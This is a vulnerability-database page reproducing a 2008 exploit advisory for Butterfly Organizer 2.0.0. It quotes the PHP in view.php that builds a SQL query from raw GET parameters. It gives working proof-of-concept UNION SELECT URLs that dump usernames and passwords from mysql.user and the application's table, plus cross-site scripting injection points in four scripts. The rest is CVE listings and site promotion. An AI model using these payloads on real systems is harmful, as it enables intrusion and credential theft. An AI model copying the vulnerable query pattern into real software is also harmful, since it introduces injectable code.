Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| CVE-2008-6311 | 13 Jun 200800:00 | – | circl | |
| CVE-2008-6328 | 13 Jun 200800:00 | – | circl | |
| CVE-2008-6700 | 13 Jun 200800:00 | – | circl | |
| CVE-2008-6311 | 27 Feb 200911:00 | – | cve | |
| CVE-2008-6328 | 27 Feb 200911:00 | – | cve | |
| CVE-2008-6700 | 10 Apr 200915:00 | – | cve | |
| CVE-2008-6311 | 27 Feb 200911:00 | – | cvelist | |
| CVE-2008-6328 | 27 Feb 200911:00 | – | cvelist | |
| CVE-2008-6700 | 10 Apr 200915:00 | – | cvelist | |
| Butterfly ORGanizer 2.0.1 - 'id' SQL Injection | 10 Dec 200800:00 | – | exploitdb |
10
======================================================================
Butterfly Organizer 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
======================================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 13 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : Butterfly Organizer
VERSION : 2.0.0
DOWNLOAD : www.butterflymedia.ro/downloads/organizer_2_0_0.zip
#####################################################
+++ Remote SQL Injection Exploit +++
----------------------------
Vulnerable Code [view.php]
----------------------------
@Line
26: $mytable = $_GET['mytable'];
27: $id = $_GET['id'];
28:
29: $result = mysql_query("SELECT * FROM ".$mytable." WHERE id=$id",$database);
30: $myrow = mysql_fetch_array($result);
----------
Exploit
----------
[+] http://[Target]/[Organizer_Path]/view.php?id=<SQL INJECTION>&mytable=test_category
-------------
POC Exploit
-------------
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/mysql.user&mytable=test_category
[+] http://192.168.24.25/organizer/view.php?id=-99999/**/UNION/**/SELECT/**/concat(username,0x3a,password),2,3,4,5,6,7,8,9,10/**/FROM/**/test_category&mytable=test_category
+++ Remote XSS Exploit +++
-----------
Exploits
-----------
[+] http://[Target]/[Organizer_Path]/view.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/viewdb2.php?id=1&mytable=<XSS>
[+] http://[Target]/[Organizer_Path]/category-rename.php?tablehere=<XSS>
[+] http://[Target]/[Organizer_Path]/module-contacts.php?letter=<XSS>
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-06-13]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01507